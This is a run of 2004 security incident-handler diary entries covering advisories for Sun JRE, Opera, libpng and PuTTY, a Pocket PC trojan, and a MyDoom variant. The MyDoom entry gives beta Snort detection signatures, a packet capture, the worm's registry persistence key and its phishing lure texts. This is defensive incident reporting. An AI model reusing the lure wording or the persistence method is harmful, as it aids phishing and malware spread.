21:32:58.055892 > FOO.FOO.104.445: S 1875311927:1875311927(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:58.059089 > FOO.FOO.104.3127: S 1875590101:1875590101(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)

Learn to catch hackers and detect and analyze malicious traffic

Sans New England is coming to Boston Monday September 13, 2004 - Saturday September 18, 2004. I will be teaching the Intrusion Detection Class, and from what I hear, class sizes will small. This is a great opportunity to get handson training in a more comfortable environment. Follow the link below for a detailed description:

Mike Poor [ mike <at> intelguardians.com ]


Published: 2004-08-05

Sun JRE Privilege Escalation, Opera Vulnerability, Pocket PC Trojan in the wild

Sun Java Runtime Environment Privilege Escalation Vulnerability

Sun released an advisory today indicating that the XSLT processor in their Java Runtime Environment doesn't properly separate privileges between applets. This could lead to cross-applet data leakage and possible applet privilege escalation. An updated JRE is available.


Opera Location Object Exploit

Looks like Phishing isn't just for Internet Explorer anymore! GreyMagic Software released an advisory today detailing a flaw in the Opera web browser which would allow an attacker to write arbitrary data to the "location" object. This has many possible repercussions, including allowing an attacker read access to arbitrary files on the victim's machine, and the ever popular URL spoofing enjoyed by phishermen around the globe. An upgrade which addresses this issue is available now.



Pocket PC Trojan Found In the Wild

... by an antivirus company, Kaspersky Labs. Either way, this is an interesting development and indicates that the race to own the mobile PCs of the world is well underway. Details on "Backdoor.WinCE.Brador.a" are available at Viruslist.


While by no means sophisticated, Brador highlights a problem which I believe will become more and more pronounced as PDAs become more ubiquitous. Who in their right mind would distrust their (smart) phone, after all? As perimeter security (slowly but surely) improves, attackers will look for alternate entry points. The classic dial-in backdoor is still far too common, although not to the levels of days past. The PDA, though, could prove to be the perfect soft target. They're usually highly insecure by default, and are allowed to waltz right past the firewall and join the network, no questions asked. Add innate wireless capabilities, often via 802.11b, Bluetooth, and infrared, and a little-known autorun "feature" (highlighted at last week's Black Hat and DefCon security conferences) and you've got an easily owned vector for $CODE_OF_YOUR_CHOICE.


Cory Altheide




Published: 2004-08-04

Libpng and putty vulnerabilities announced today

Libpng Vulnerability:
Proof of concept code for a buffer overflow of libpng was released today. A patched version is available (libpng version 1.2.6rc1)

US CERT announcement: http://www.uscert.gov/cas/techalerts/TA04-217A.html

In other vulnerability news: putty v.54 and below

Details available at the author’s website: http://www.chiark.greenend.org.uk/~sgtatham/putty/changes.html

CORE's analysis:

The latest version, 0.55 is available at: http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html


WinSCP, which uses code from PuTTY, has also been updated in response to the above vulnerability.


Mydoom.p snort signatures are available at bleedingsnort.


Remember that oinkmaster can update your snort rules daily from bleedingsnort.com! I use this on the honeynet at home and the test snort server at work.

On individual response to phishing emails:
Phishing incidents are on the rise. The handlers are receiving more and more reports of suspicious emails. My recommended response procedure is as follows:

i) report the email to the impersonated company’s abuse address (typically this is abuse@victimdomain.) Include a copy of the email and the full delivery headers. Their teams will use this information to determine the source of the email, and the location of the collection server.

ii) report the incident to antiphishing.org. They are scientifically tracking these incidents and organizing responses.
SSH Brute force reporting update:
Reports of SSH scans with simple username/password combinations continue to come in. We are currently looking for the tool/malicious code that is performing these scans.
Kevin Liston,
Handler on Duty,
kliston AT greenman-consulting DOT com


Published: 2004-08-03

New MyDoom In The Wild

An apology

It was my intention to post Part II of my "Follow the Bouncing Malware" article today. Instead, the other Handlers and I ended up following the bouncing MyDoom. A quick note of thanks to all of the other Handlers, the AV Vendors, and many others for pitching in and keeping this one from getting out of control. (TL)

New MyDoom On The Loose

Initial analysis (we will update as we know more):

Currently (16:00GMT), signatures are not yet available.


- Signatures are starting to come out, identifying this as MyDoom.O, MyDoom.P or Evaman.C

- It appears that this may only work on Win2K and WinXP machines because the executable requires psapi.dll.

- Copies itself to the Windows' system directory as winlibs.exe and installs itself under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

UPDATED (17:30GMT) - *BETA* Snort Sigs:

UPDATED (17:40GMT) - *BETA #2* Snort Sigs:

UPDATED (19:30GMT) - *BETA #3* Snort Sigs:

var YAHOO []
#var YAHOO any
pass tcp any any -> $YAHOO 80 (msg: "Beta - MyDoom.P yahoo email address search";\
sid:900018; rev:4; flow:established,to_server; flags:A+;\
flowbits:set,search_uri; content: "/py/psSearch.py|3f|";)
alert tcp any any -> $YAHOO 80 (msg: "Beta - MyDoom.P yahoo email address search";\
sid:900018; rev:4; flow:established,to_server; flags:A+;\
flowbits:isset,search_uri; content: "Host|3a| EMAIL.PEOPLE.YAHOO.COM";)

Targets Yahoo's people search:


NEW (1700GMT)- Example packet capture:

12:23:22.922862 > P 5:310(305) ack 1 win 175 20 (DF)
0x0000 4500 0159 0077 4000 8006 96ba 0a01 0081 E..Y.w@.........
0x0010 d86d 7f7e 040b 0050 2217 187c 6b8a 5eb1 .m.~...P"..|k.^.
0x0020 5018 4470 46c9 0000 2f70 792f 7073 5365 P.DpF.../py/psSe
0x0030 6172 6368 2e70 793f 4669 7273 744e 616d arch.py?FirstNam
0x0040 653d 4a61 6d69 6526 696e 6465 783d 2048 e=Jamie&index=.H
0x0050 5454 502f 312e 300d 0a41 6363 6570 743a TTP/1.0..Accept:
0x0060 2069 6d61 6765 2f67 6966 2c20 696d 6167 .image/gif,.imag
0x0070 652f 782d 7862 6974 6d61 702c 2069 6d61 e/x-xbitmap,.ima
0x0080 6765 2f6a 7065 672c 2069 6d61 6765 2f70 ge/jpeg,.image/p
0x0090 6a70 6567 2c20 6170 706c 6963 6174 696f jpeg,.applicatio
0x00a0 6e2f 766e 642e 6d73 2d65 7863 656c 2c20 n/vnd.ms-excel,.
0x00b0 6170 706c 6963 6174 696f 6e2f 6d73 776f application/mswo
0x00c0 7264 2c20 6170 706c 6963 6174 696f 6e2f rd,.application/
0x00d0 766e 642e 6d73 2d70 6f77 6572 706f 696e vnd.ms-powerpoin
0x00e0 742c 202a 2f2a 0d0a 4163 6365 7074 2d4c t,.*/*..Accept-L
0x00f0 616e 6775 6167 653a 2065 6e2d 7573 0d0a anguage:.en-us..
0x0100 4163 6365 7074 2d45 6e63 6f64 696e 673a Accept-Encoding:
0x0110 2067 7a69 702c 2064 6566 6c61 7465 0d0a .gzip,.deflate..
0x0120 5573 6572 2d41 6765 6e74 3a20 4d6f 7a69 User-Agent:.Mozi
0x0130 6c6c 612f 342e 300d 0a48 6f73 743a 2045 lla/4.0..Host:.E
0x0140 4d41 494c 2e50 454f 504c 452e 5941 484f MAIL.PEOPLE.YAHO
0x0150 4f2e 434f 4d0d 0a0d 0a O.COM....

Message subjects(?):

SN: New secure mail

SN: New secure mail

Secure delivery

Secure delivery

failed transaction

failed transaction

Re: hello (Secure-Mail)

Re: hello (Secure-Mail)

Re: Extended Mail

Re: Extended Mail

Delivery Status (Secure)

Delivery Status (Secure)

Re: Server Reply

Re: Server Reply

SN: Server Status

SN: Server Status

Message body contains(?):

Automatically Secure Delivery: for

Automatically Secure Delivery: for

Mail Delivery Server System: for

Mail Delivery Server System: for

Extended secure mail message available at:

Extended secure mail message available at:

Secure Mail Server Notification: for

Secure Mail Server Notification: for

New mail secure method implement: for

New mail secure method implement: for

New policy requested by mail server to returned mail

as a secure compiled attachment (Zip).

New policy requested by mail server to returned mail

as a secure compiled attachment (Zip).

Now a new message is available as secure Zip file format.

Due to new policies on clients.

Now a new message is available as secure Zip file format.

Due to new policies on clients.

This message is available as a secure Zip file format

due to a new security policy.

This message is available as a secure Zip file format

due to a new security policy.

For security measures this message has been packed as Zip format.

This is a newly added security feature.

For security measures this message has been packed as Zip format.

This is a newly added security feature.

New policy recommends to enclose all messages as Zip format.

Your message is available in this server notice.

New policy recommends to enclose all messages as Zip format.

Your message is available in this server notice.

You have received a message that implements secure delivery technology.

Message available as a secure Zip file.

You have received a message that implements secure delivery technology.

Message available as a secure Zip file.

This message is an automatically server notice

from Administration at

This message is an automatically server notice

from Administration at

Server Notice: New security feature added. MSG:ID: 455sec86

Server Notice: New security feature added. MSG:ID: 455sec86

New feature added for security reasons

New feature added for security reasons

Automatically server notice:,

Server reply from

Automatically server notice:,

Server reply from

New service policy for security added from

New service policy for security added from

The executable contains the following names that are used to search Yahoo:



Handler on Duty: Tom Liston ( http://www.labreatechnologies.com )


Published: 2004-08-02

A very [word beginning with 'q' deleted] day and helpful links

Not Much Happening

All in all it's been a fairly uneventful day.

Helpful Links

Dshield reports - http://www.dshield.org/reports.php

Last 25 papers added to the SANS Reading room - http://www.sans.org/rr/last.php">http://www.sans.org/rr/last.php

Local Mentor Program - http://www.sans.org/local/about.php

How to submit logs to Dshield - http://www.dshield.org/howto.php

Sample Policies - http://www.sans.org/resources/policies/

SANS FAQ - http://www.sans.org/faq.php

Reading Room - http://www.sans.org/rr/

Upcoming Webcasts - http://www.sans.org/webcasts/

Volunteer Program - http://www.sans.org/conference/volunteer.php


Published: 2004-08-01

Update to MS04-025; Windows 2003 Guides Released; Port 3072; Your Daily Phish

Update to MS04-025 for XP users

For all folks using Windows XP, it is advised that you do another Windows Update to ensure that your patches have been correctly updated.

Microsoft stated the following:

"Subsequent to the release of this security bulletin, Microsoft was
made aware that the update provided for Windows XP customers running
the new version of Windows Update, Windows Update Version 5, did not
contain the final release code for the vulnerabilities addressed in
the security bulletin. Microsoft has corrected the update and is
re-releasing this bulletin to advise of the availability of a revised
update available to Windows Update Version 5 customers. Customers who
are utilizing Windows Update Version 4, the vast majority of
customers, are not affected by this revision."


Windows 2003 Guides Released

Microsoft has released two documents, available at the links below,
for download that has some excellent information regarding security.
These documents contain excellent information and references to tools
that every administrator could use.

Threats and Countermeasures: Security Settings in Windows Server 2003 and
Windows XP

Windows Server 2003 Security Guide

Port 3072

We have received more emails concerning traffic on Port 3072 and some good suggestions as to the cause. If you have any captures of the traffic, please pass them our direction.

Your Daily Phish

A user submitted to ISC today another phishing email scam. This one wanted the victim to change their pin number. As a general reminder, keep in mind which email address, if any, you have given to your financial institution(s) and always verify before you update any information requested via email.
Lorna J. Hutcheson/Tony Carothers

Handler on Duty